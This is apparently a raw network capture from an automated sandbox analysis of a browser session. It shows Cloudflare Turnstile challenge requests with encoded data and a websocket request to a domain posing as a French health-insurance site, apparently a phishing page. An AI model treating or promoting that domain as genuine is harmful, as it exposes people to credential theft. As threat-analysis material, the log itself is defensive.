                        2024-07-03 12:39:13 UTC1369INData Raw: 5b 69 7a 28 31 35 32 30 29 5d 3d 69 7a 28 31 30 35 39 29 2c 67 37 5b 69 7a 28 38 36 34 29 5d 3d 69 7a 28 35 31 39 29 2c 67 37 5b 69 7a 28 31 35 30 35 29 5d 3d 69 7a 28 38 37 33 29 2c 67 37 5b 69 7a 28 31 36 31 33 29 5d 3d 69 7a 28 32 32 34 36 29 2c 67 37 5b 69 7a 28 31 38 37 36 29 5d 3d 69 7a 28 31 30 38 30 29 2c 67 37 5b 69 7a 28 35 30 30 29 5d 3d 69 7a 28 31 31 31 30 29 2c 67 37 5b 69 7a 28 31 37 36 31 29 5d 3d 69 7a 28 31 39 33 33 29 2c 67 37 5b 69 7a 28 37 31 31 29 5d 3d 69 7a 28 37 39 35 29 2c 67 37 5b 69 7a 28 31 37 30 30 29 5d 3d 69 7a 28 32 32 31 34 29 2c 67 37 5b 69 7a 28 31 33 38 36 29 5d 3d 69 7a 28 31 39 39 31 29 2c 67 37 5b 69 7a 28 32 32 36 35 29 5d 3d 69 7a 28 32 32 30 31 29 2c 67 37 5b 69 7a 28 34 33 38 29 5d 3d 69 7a 28 31 36 33 36 29 2c
                        Data Ascii: [iz(1520)]=iz(1059),g7[iz(864)]=iz(519),g7[iz(1505)]=iz(873),g7[iz(1613)]=iz(2246),g7[iz(1876)]=iz(1080),g7[iz(500)]=iz(1110),g7[iz(1761)]=iz(1933),g7[iz(711)]=iz(795),g7[iz(1700)]=iz(2214),g7[iz(1386)]=iz(1991),g7[iz(2265)]=iz(2201),g7[iz(438)]=iz(1636),
                        2024-07-03 12:39:13 UTC1369INData Raw: 32 31 33 37 29 2c 67 61 5b 69 7a 28 35 30 38 29 5d 3d 69 7a 28 37 30 37 29 2c 67 61 5b 69 7a 28 33 36 36 29 5d 3d 69 7a 28 38 36 30 29 2c 67 61 5b 69 7a 28 38 38 38 29 5d 3d 69 7a 28 32 30 30 34 29 2c 67 62 3d 7b 7d 2c 67 62 5b 69 7a 28 36 30 34 29 5d 3d 69 7a 28 31 38 36 38 29 2c 67 62 5b 69 7a 28 31 35 32 30 29 5d 3d 69 7a 28 31 37 34 30 29 2c 67 62 5b 69 7a 28 38 36 34 29 5d 3d 69 7a 28 31 35 38 33 29 2c 67 62 5b 69 7a 28 31 35 30 35 29 5d 3d 69 7a 28 33 35 32 29 2c 67 62 5b 69 7a 28 31 36 31 33 29 5d 3d 69 7a 28 32 30 38 33 29 2c 67 62 5b 69 7a 28 31 38 37 36 29 5d 3d 69 7a 28 31 37 36 34 29 2c 67 62 5b 69 7a 28 35 30 30 29 5d 3d 69 7a 28 38 39 39 29 2c 67 62 5b 69 7a 28 31 37 36 31 29 5d 3d 69 7a 28 32 31 31 34 29 2c 67 62 5b 69 7a 28 37 31 31 29 5d
                        Data Ascii: 2137),ga[iz(508)]=iz(707),ga[iz(366)]=iz(860),ga[iz(888)]=iz(2004),gb={},gb[iz(604)]=iz(1868),gb[iz(1520)]=iz(1740),gb[iz(864)]=iz(1583),gb[iz(1505)]=iz(352),gb[iz(1613)]=iz(2083),gb[iz(1876)]=iz(1764),gb[iz(500)]=iz(899),gb[iz(1761)]=iz(2114),gb[iz(711)]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.649737104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:13 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:13 UTC240INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:13 GMT
                        Content-Type: image/png
                        Content-Length: 61
                        Connection: close
                        cache-control: max-age=2629800, public
                        Server: cloudflare
                        CF-RAY: 89d6efe64cd441af-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                        Data Ascii: PNGIHDRsIDAT$IENDB`


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.649738104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:14 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:14 UTC240INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:14 GMT
                        Content-Type: image/png
                        Content-Length: 61
                        Connection: close
                        cache-control: max-age=2629800, public
                        Server: cloudflare
                        CF-RAY: 89d6efea8a5041ad-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                        Data Ascii: PNGIHDRsIDAT$IENDB`


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.649740104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:14 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2115433930:1720008719:mWbT4_enhs2h_w32qRfd66TmkEtkTYfuBx_guyabV0E/89d6efe14aad728f/0228ee3c2a32d26 HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        Content-Length: 2904
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        Content-type: application/x-www-form-urlencoded
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        CF-Challenge: 0228ee3c2a32d26
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Origin: https://challenges.cloudflare.com
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:14 UTC2904OUTData Raw: 76 5f 38 39 64 36 65 66 65 31 34 61 61 64 37 32 38 66 3d 6a 63 73 71 4e 71 78 71 75 71 37 71 6c 71 70 6f 52 48 6f 52 64 75 43 64 43 77 32 33 43 32 52 43 75 4d 77 51 52 50 73 31 52 24 6f 52 7a 51 43 50 32 34 52 51 75 43 64 56 2d 4d 65 43 37 52 32 62 65 47 43 39 52 2d 2d 32 6c 64 52 79 63 43 61 54 45 6c 47 71 52 51 71 52 25 32 62 52 39 53 73 52 53 77 6b 52 52 57 39 52 24 2d 4d 43 79 41 52 41 64 56 34 61 6f 31 57 67 56 41 52 58 75 52 33 48 45 53 51 53 76 41 5a 5a 75 43 77 4f 33 71 52 56 52 63 71 32 39 74 24 49 73 4f 6e 67 4b 59 45 46 67 78 44 49 24 65 44 49 56 52 4d 63 64 52 41 47 52 77 39 4a 73 41 6a 2d 52 47 71 32 34 65 4d 37 6f 47 4d 31 52 59 53 4f 63 52 43 73 52 5a 45 66 47 52 41 79 4e 52 24 33 33 4f 6e 79 4e 74 73 24 58 69 2d 43 67 71 4a 67 31 6e 2d 52
                        Data Ascii: v_89d6efe14aad728f=jcsqNqxquq7qlqpoRHoRduCdCw23C2RCuMwQRPs1R$oRzQCP24RQuCdV-MeC7R2beGC9R--2ldRycCaTElGqRQqR%2bR9SsRSwkRRW9R$-MCyARAdV4ao1WgVARXuR3HESQSvAZZuCwO3qRVRcq29t$IsOngKYEFgxDI$eDIVRMcdRAGRw9JsAj-RGq24eM7oGM1RYSOcRCsRZEfGRAyNR$33OnyNts$Xi-CgqJg1n-R
                        2024-07-03 12:39:14 UTC771INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:14 GMT
                        Content-Type: text/plain; charset=UTF-8
                        Content-Length: 128496
                        Connection: close
                        cf-chl-gen: MsTSXXGMGL8R6UKMqs5UdSlUy4sIFZYT7xokfU2s66YRLS+0tM0wIgnTfwVTZiP8ZBmnN11djmb8qNnO+e0sehsOZj6nNnHGIYrYNLOvksZeVjCqwJsz0/0/rxyTTLjN1H/uLgBWOslUes1er63XNnl/z7w8njCsxq/niuQYt7COCafeIpD3i7F+eSun46sxF1bkbzrtKxuo0Coz38Vn7tMVJp2EgsiDvaes8VSmR6UI/gghNplCA8PI4p+nr8SmxRZV5OcNCW5Jh1w3Pqh6/vyRAK+0NDTED3AGgbnEYLTxG4ewfOkUcfmNvsWDL2C7yiUi8EDvpQNFWwZfqfrrZaS2aPxQ0MXCqVwLemyr6b0x5JfWZ3KBtB6jqMPniwEoRDNk7hyeSBJRZRbBBlyDroPhZ7Dc2rJ8ZyIzDVaojAO9trqSvBEYPDh7ZnMEHeW/aNk/7BfJD8aniBxvMbBjfI7eB7J7fL3iujXDrYDGPiG9CfjvJPWp8jEC7Kjh2Nf5$Yuo0AqkaxWbu4iPMX3THCA==
                        Server: cloudflare
                        CF-RAY: 89d6efeb9b888c1d-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:14 UTC598INData Raw: 6b 48 69 55 70 37 68 30 77 48 70 33 6d 70 32 77 6f 71 2b 44 73 4d 43 71 69 4b 48 42 78 72 71 37 68 37 4b 62 7a 38 57 7a 6f 4b 54 43 70 37 54 58 7a 63 71 62 75 64 37 56 32 38 7a 63 75 4c 58 64 33 2b 48 6b 72 4e 36 34 71 4d 48 4e 35 4d 7a 70 7a 61 33 6e 7a 62 66 74 75 4b 37 5a 75 76 76 72 39 2f 6e 76 39 50 6a 43 34 66 45 43 34 63 54 63 34 4f 34 44 2b 2b 76 74 38 41 48 76 44 51 30 56 39 77 54 58 2f 52 63 58 38 52 41 58 47 2f 55 53 48 76 33 67 2b 66 77 4c 44 52 77 46 43 69 63 67 43 51 34 4d 4d 78 59 53 42 51 30 55 45 66 63 75 4f 7a 49 34 43 7a 73 72 49 6a 73 2f 50 6a 51 39 48 78 78 49 4e 79 6b 62 49 7a 49 45 45 55 67 66 4d 77 34 6c 46 79 59 35 47 46 46 62 55 6b 68 5a 56 79 41 32 59 46 38 34 4b 43 4e 67 4b 45 5a 5a 4a 45 35 45 63 44 78 64 4b 6e 52 32 4c 32 46
                        Data Ascii: kHiUp7h0wHp3mp2woq+DsMCqiKHBxrq7h7Kbz8WzoKTCp7TXzcqbud7V28zcuLXd3+HkrN64qMHN5Mzpza3nzbftuK7Zuvvr9/nv9PjC4fEC4cTc4O4D++vt8AHvDQ0V9wTX/RcX8RAXG/USHv3g+fwLDRwFCicgCQ4MMxYSBQ0UEfcuOzI4CzsrIjs/PjQ9HxxINykbIzIEEUgfMw4lFyY5GFFbUkhZVyA2YF84KCNgKEZZJE5EcDxdKnR2L2F
                        2024-07-03 12:39:14 UTC1369INData Raw: 73 35 58 58 35 37 61 58 78 31 67 58 46 32 67 7a 6d 46 56 56 4a 42 57 6f 70 32 61 34 5a 49 59 49 79 49 5a 58 65 55 63 6e 4f 5a 69 33 70 5a 6d 4a 79 54 69 5a 36 5a 59 61 57 52 6d 4b 42 37 6e 36 4e 38 72 59 31 6c 6a 6e 47 70 66 57 39 76 71 71 79 4a 73 35 61 30 75 6e 56 38 66 59 32 64 66 4b 47 41 75 62 32 30 6e 4c 2b 66 78 37 6d 6e 72 35 32 72 75 72 50 55 70 6f 32 52 77 74 69 31 32 37 50 51 31 37 4f 75 73 72 7a 63 7a 4d 50 56 7a 39 50 6f 36 4e 76 59 77 36 76 72 33 65 58 66 35 38 6e 52 38 4f 58 75 79 4d 50 50 78 72 54 75 2f 4d 6e 67 79 74 2f 78 2b 62 66 33 33 4d 48 6d 38 2b 72 68 44 65 58 46 42 66 6e 45 38 65 62 4f 39 51 34 52 47 65 33 32 35 50 76 63 49 4e 67 65 37 76 66 62 2f 50 30 6f 2f 67 63 6c 48 75 59 6a 4c 50 6e 36 43 43 30 6d 37 76 4d 30 41 67 4c 72 4e
                        Data Ascii: s5XX57aXx1gXF2gzmFVVJBWop2a4ZIYIyIZXeUcnOZi3pZmJyTiZ6ZYaWRmKB7n6N8rY1ljnGpfW9vqqyJs5a0unV8fY2dfKGAub20nL+fx7mnr52rurPUpo2Rwti127PQ17OusrzczMPVz9Po6NvYw6vr3eXf58nR8OXuyMPPxrTu/Mngyt/x+bf33MHm8+rhDeXFBfnE8ebO9Q4RGe325PvcINge7vfb/P0o/gclHuYjLPn6CC0m7vM0AgLrN
                        2024-07-03 12:39:14 UTC1369INData Raw: 2b 57 54 35 61 57 6c 4d 2b 61 6f 64 56 56 6f 5a 48 5a 47 6c 76 62 59 56 69 53 30 78 53 6c 33 4b 62 66 47 39 71 57 4a 71 63 6c 58 47 68 5a 4a 65 62 69 48 4f 63 6e 33 75 5a 6f 71 4f 6c 71 5a 4b 47 68 6f 4b 56 62 61 74 30 6b 71 36 32 73 35 65 53 6f 4c 47 62 71 37 56 39 72 59 53 37 67 38 71 42 6e 62 53 57 6e 34 36 59 79 5a 71 76 6f 4b 62 4b 6e 39 65 53 7a 4a 69 32 73 36 6d 52 75 39 4c 56 76 73 54 43 34 39 57 36 73 71 6a 57 70 61 32 71 33 4b 75 36 71 39 76 72 39 65 4c 30 30 4c 44 50 35 36 37 52 31 4f 44 6f 31 4e 6e 64 75 2f 54 4f 42 41 50 46 39 75 6b 4e 35 41 48 68 34 41 50 4c 43 77 4c 53 39 66 62 31 32 51 6e 35 2f 64 76 56 38 51 6e 70 49 43 41 4f 46 52 6f 6d 46 68 2f 67 36 53 7a 31 45 43 34 70 47 69 62 70 4c 52 63 6e 46 76 41 31 4b 78 73 61 4b 52 38 67 48 78
                        Data Ascii: +WT5aWlM+aodVVoZHZGlvbYViS0xSl3KbfG9qWJqclXGhZJebiHOcn3uZoqOlqZKGhoKVbat0kq62s5eSoLGbq7V9rYS7g8qBnbSWn46YyZqvoKbKn9eSzJi2s6mRu9LVvsTC49W6sqjWpa2q3Ku6q9vr9eL00LDP567R1ODo1Nndu/TOBAPF9ukN5AHh4APLCwLS9fb12Qn5/dvV8QnpICAOFRomFh/g6Sz1EC4pGibpLRcnFvA1KxsaKR8gHx
                        2024-07-03 12:39:14 UTC1369INData Raw: 56 33 2b 44 58 57 4e 59 68 32 79 4d 5a 32 31 6e 54 32 6c 31 68 46 57 4d 6b 5a 65 55 6d 35 2b 68 6d 49 74 76 6d 6e 36 55 5a 58 4a 6a 5a 57 70 36 61 6d 56 73 68 58 42 75 73 4b 69 55 69 6f 52 71 65 49 65 45 71 5a 53 39 66 58 39 2b 65 63 43 73 72 5a 4b 6a 75 6f 57 39 77 63 65 2f 6c 70 75 43 77 34 6d 46 72 35 50 4a 72 36 6d 4c 7a 73 2b 6f 6d 4a 57 32 79 4d 6d 75 77 72 43 68 32 64 33 6a 33 37 4b 33 6e 74 2b 6c 6f 63 75 76 35 63 76 56 35 4c 54 6a 37 4c 6e 51 30 4d 65 32 38 75 37 4e 2f 4e 6a 6b 37 4e 6a 6c 7a 39 48 67 41 75 44 6a 41 4d 44 4c 37 41 37 76 41 50 4d 46 7a 41 50 53 45 66 44 77 35 39 59 54 44 2b 33 64 2b 41 55 4e 2b 41 66 76 38 51 45 69 41 51 51 67 34 4f 73 4e 4a 67 6f 6a 4b 78 66 79 4a 79 6f 54 39 69 63 79 2b 54 77 72 49 51 73 5a 47 51 38 75 4e 50 31
                        Data Ascii: V3+DXWNYh2yMZ21nT2l1hFWMkZeUm5+hmItvmn6UZXJjZWp6amVshXBusKiUioRqeIeEqZS9fX9+ecCsrZKjuoW9wce/lpuCw4mFr5PJr6mLzs+omJW2yMmuwrCh2d3j37K3nt+locuv5cvV5LTj7LnQ0Me28u7N/Njk7Njlz9HgAuDjAMDL7A7vAPMFzAPSEfDw59YTD+3d+AUN+Afv8QEiAQQg4OsNJgojKxfyJyoT9icy+TwrIQsZGQ8uNP1
                        2024-07-03 12:39:14 UTC1369INData Raw: 32 47 4e 62 32 71 4e 58 57 79 47 57 48 42 53 6c 31 70 35 6c 4a 68 59 64 57 71 55 6d 4a 36 45 6e 59 5a 35 6c 58 65 49 6d 6d 32 6c 67 61 4e 70 62 4a 4f 57 68 59 4e 71 69 71 4f 31 62 70 4f 4f 73 33 79 64 6f 35 2b 43 67 62 71 39 77 37 65 53 6d 4d 66 48 7a 59 47 72 6a 59 37 52 77 4e 4b 30 74 5a 50 61 72 63 36 31 32 72 47 34 31 36 48 53 73 65 47 39 33 64 32 7a 78 36 62 6e 75 73 7a 42 72 74 37 75 38 61 6d 39 72 4e 36 74 7a 2b 48 5a 2b 64 4f 32 36 37 33 7a 73 37 54 68 2b 73 2f 78 38 63 54 42 78 65 72 68 33 4e 33 37 36 75 48 7a 35 39 51 4c 36 68 48 6e 43 52 73 58 46 75 67 41 31 51 6f 57 37 42 7a 63 42 52 44 78 35 67 49 4d 2b 42 55 61 44 68 77 4d 4c 54 51 50 2f 51 30 32 49 54 63 6f 4e 44 55 4f 45 7a 7a 39 50 7a 41 36 50 52 59 62 2f 6b 41 68 42 6b 63 4b 48 69 4d 47
                        Data Ascii: 2GNb2qNXWyGWHBSl1p5lJhYdWqUmJ6EnYZ5lXeImm2lgaNpbJOWhYNqiqO1bpOOs3ydo5+Cgbq9w7eSmMfHzYGrjY7RwNK0tZParc612rG416HSseG93d2zx6bnuszBrt7u8am9rN6tz+HZ+dO2673zs7Th+s/x8cTBxerh3N376uHz59QL6hHnCRsXFugA1QoW7BzcBRDx5gIM+BUaDhwMLTQP/Q02ITcoNDUOEzz9PzA6PRYb/kAhBkcKHiMG
                        2024-07-03 12:39:14 UTC1369INData Raw: 36 49 6a 4a 4a 34 6b 58 70 74 69 57 74 38 6a 6d 47 5a 64 5a 64 64 59 49 65 4b 65 58 64 65 66 70 65 70 59 6f 65 43 70 33 42 2b 67 35 4e 32 64 61 36 78 74 36 75 47 6a 4c 75 37 77 58 57 66 67 59 4c 46 74 4d 61 6f 71 59 66 4f 6f 63 4b 70 7a 71 57 73 79 35 58 47 70 64 57 78 30 64 47 6e 75 35 72 62 72 73 43 31 6f 74 4c 69 35 5a 32 78 6f 4e 4b 68 77 39 58 4e 37 63 65 71 33 37 48 6e 70 36 6a 55 73 38 76 4a 35 37 65 31 32 62 62 71 37 4c 37 54 38 2f 63 49 77 50 49 4b 42 66 66 62 34 38 67 4b 35 51 66 53 45 50 54 6e 45 50 51 45 46 4f 30 58 35 52 44 37 46 39 77 4e 33 76 6e 65 2b 76 72 7a 33 76 59 6f 39 66 59 71 4b 53 4c 70 35 7a 44 39 2f 69 6f 78 4b 76 49 59 4d 67 63 78 2b 7a 6b 79 2b 68 6f 50 46 42 6e 37 46 78 55 48 41 54 67 31 50 68 73 4a 53 67 4e 47 49 6c 4d 71 53
                        Data Ascii: 6IjJJ4kXptiWt8jmGZdZddYIeKeXdefpepYoeCp3B+g5N2da6xt6uGjLu7wXWfgYLFtMaoqYfOocKpzqWsy5XGpdWx0dGnu5rbrsC1otLi5Z2xoNKhw9XN7ceq37Hnp6jUs8vJ57e12bbq7L7T8/cIwPIKBffb48gK5QfSEPTnEPQEFO0X5RD7F9wN3vne+vrz3vYo9fYqKSLp5zD9/ioxKvIYMgcx+zky+hoPFBn7FxUHATg1PhsJSgNGIlMqS
                        2024-07-03 12:39:14 UTC1369INData Raw: 61 56 6f 74 5a 6e 70 61 61 65 32 4b 46 67 47 47 43 66 34 57 6a 6e 57 35 75 6d 61 79 75 6b 6e 4a 78 6f 5a 53 46 6b 70 61 56 63 33 6d 4b 75 71 71 38 6f 38 52 36 6c 4a 6d 6b 74 34 57 38 79 4c 2b 34 68 4c 37 47 6f 37 36 78 77 59 33 56 72 59 71 56 78 39 6a 50 7a 4d 69 39 6d 4e 54 4c 76 5a 75 68 73 75 4c 53 35 4d 76 73 6f 72 7a 42 7a 4e 2b 74 35 50 44 6e 34 64 4c 6a 74 62 4c 45 32 66 6d 31 2f 64 57 79 76 65 38 42 39 2f 54 77 35 4e 58 46 38 75 58 44 79 64 6f 4c 2b 67 33 7a 46 63 72 6b 36 66 51 49 31 51 30 5a 45 41 6f 57 47 66 44 33 37 77 4d 53 33 53 62 39 32 75 55 59 4b 53 41 64 47 51 33 39 48 52 4d 4f 36 2f 45 44 4d 79 4d 31 48 44 33 79 44 52 49 64 4d 50 30 31 51 54 67 2b 47 44 63 45 4d 68 52 42 47 6a 38 50 4f 69 78 50 54 7a 4d 54 45 6a 63 33 4a 6a 4d 32 4f 53
                        Data Ascii: aVotZnpaae2KFgGGCf4WjnW5umayuknJxoZSFkpaVc3mKuqq8o8R6lJmkt4W8yL+4hL7Go76xwY3VrYqVx9jPzMi9mNTLvZuhsuLS5MvsorzBzN+t5PDn4dLjtbLE2fm1/dWyve8B9/Tw5NXF8uXDydoL+g3zFcrk6fQI1Q0ZEAoWGfD37wMS3Sb92uUYKSAdGQ39HRMO6/EDMyM1HD3yDRIdMP01QTg+GDcEMhRBGj8POixPTzMTEjc3JjM2OS
                        2024-07-03 12:39:14 UTC1369INData Raw: 6c 5a 32 6b 63 70 35 6e 68 6d 75 56 71 6f 53 44 59 6e 75 65 6b 6e 47 49 6e 72 4b 43 73 61 69 51 71 59 57 53 72 59 78 33 6f 34 4f 42 6f 5a 42 2f 68 35 53 64 78 59 75 58 68 4a 6d 4c 79 62 2b 4c 6f 4d 76 57 6b 61 4f 6c 78 62 71 30 73 39 32 61 6c 39 54 4d 6f 62 66 57 74 38 54 57 35 63 76 59 33 63 50 43 75 36 61 2b 37 37 32 2b 38 66 44 70 73 61 2f 33 78 63 62 79 74 39 54 5a 32 39 33 31 30 39 69 39 78 67 6a 6a 2f 41 4c 59 77 39 37 63 7a 4d 72 6d 7a 2f 33 4f 37 50 62 57 31 66 6b 55 2b 39 6b 67 47 52 54 66 34 67 30 6d 49 2f 33 6d 49 78 6b 44 34 75 4c 66 42 42 67 73 47 69 45 55 4a 43 77 51 45 68 41 32 4b 6a 41 59 46 53 64 42 45 30 48 39 4e 43 38 69 2f 52 6f 32 45 30 51 39 51 45 31 4b 47 6c 49 45 43 69 59 53 4a 79 52 55 51 6c 4d 58 4e 55 39 57 54 42 63 59 54 47 4d
                        Data Ascii: lZ2kcp5nhmuVqoSDYnueknGInrKCsaiQqYWSrYx3o4OBoZB/h5SdxYuXhJmLyb+LoMvWkaOlxbq0s92al9TMobfWt8TW5cvY3cPCu6a+772+8fDpsa/3xcbyt9TZ293109i9xgjj/ALYw97czMrmz/3O7PbW1fkU+9kgGRTf4g0mI/3mIxkD4uLfBBgsGiEUJCwQEhA2KjAYFSdBE0H9NC8i/Ro2E0Q9QE1KGlIECiYSJyRUQlMXNU9WTBcYTGM
                        2024-07-03 12:39:14 UTC1369INData Raw: 48 71 4a 61 32 79 45 6d 37 43 77 72 4a 39 78 71 4c 53 72 70 59 65 73 73 37 57 4c 6e 61 36 4a 6e 34 43 50 6c 37 61 76 66 73 4f 31 74 4b 57 73 74 36 72 45 71 59 6d 74 69 38 43 65 31 4b 7a 55 78 70 6e 51 74 39 69 37 33 36 79 5a 7a 72 75 35 78 4e 69 66 32 4f 4c 41 33 63 6e 4c 34 61 79 36 37 36 6d 6d 79 64 4c 68 73 64 53 78 37 74 48 79 7a 4d 76 4e 41 63 7a 78 32 41 50 67 7a 39 51 42 35 4e 50 59 41 65 6a 58 33 41 44 4c 36 4f 55 47 37 51 6f 42 47 68 51 46 43 42 41 59 37 4e 38 5a 32 39 73 47 42 66 72 6c 46 77 66 70 35 51 45 6f 4d 43 38 4e 4c 69 66 73 37 68 2f 30 39 51 7a 78 43 41 77 55 39 67 6f 33 44 7a 4d 54 47 54 30 6c 2b 44 73 39 45 30 55 70 42 67 70 41 4b 42 39 42 53 44 55 6a 56 77 34 72 4b 79 4a 59 4c 78 63 38 55 46 4a 4b 4f 7a 4d 6b 56 78 31 42 59 30 52 6c
                        Data Ascii: HqJa2yEm7CwrJ9xqLSrpYess7WLna6Jn4CPl7avfsO1tKWst6rEqYmti8Ce1KzUxpnQt9i736yZzru5xNif2OLA3cnL4ay676mmydLhsdSx7tHyzMvNAczx2APgz9QB5NPYAejX3ADL6OUG7QoBGhQFCBAY7N8Z29sGBfrlFwfp5QEoMC8NLifs7h/09QzxCAwU9go3DzMTGT0l+Ds9E0UpBgpAKB9BSDUjVw4rKyJYLxc8UFJKOzMkVx1BY0Rl


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.649739102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:14 UTC612OUTGET /websockets HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: Upgrade
                        Pragma: no-cache
                        Cache-Control: no-cache
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Upgrade: websocket
                        Origin: https://cartevitale-ameli.santeassures-informations.eu
                        Sec-WebSocket-Version: 13
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        Sec-WebSocket-Key: Hhd9qevwwo25sYWpyBkMOg==
                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                        2024-07-03 12:39:15 UTC178INHTTP/1.1 426 Upgrade Required
                        Date: Wed, 03 Jul 2024 12:39:12 GMT
                        Content-Type: text/plain
                        Content-Length: 16
                        Connection: close
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:15 UTC16INData Raw: 55 70 67 72 61 64 65 20 52 65 71 75 69 72 65 64
                        Data Ascii: Upgrade Required


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.649742104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:17 UTC805OUTGET /cdn-cgi/challenge-platform/h/g/pat/89d6efe14aad728f/1720010354548/f6b3f694799fbd2dd6b2412977b9f8009ebec1e6b44163290b73627a156132ba/xjaWdIKTKn7go5y HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        Cache-Control: max-age=0
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:17 UTC143INHTTP/1.1 401 Unauthorized
                        Date: Wed, 03 Jul 2024 12:39:17 GMT
                        Content-Type: text/plain; charset=UTF-8
                        Content-Length: 1
                        Connection: close
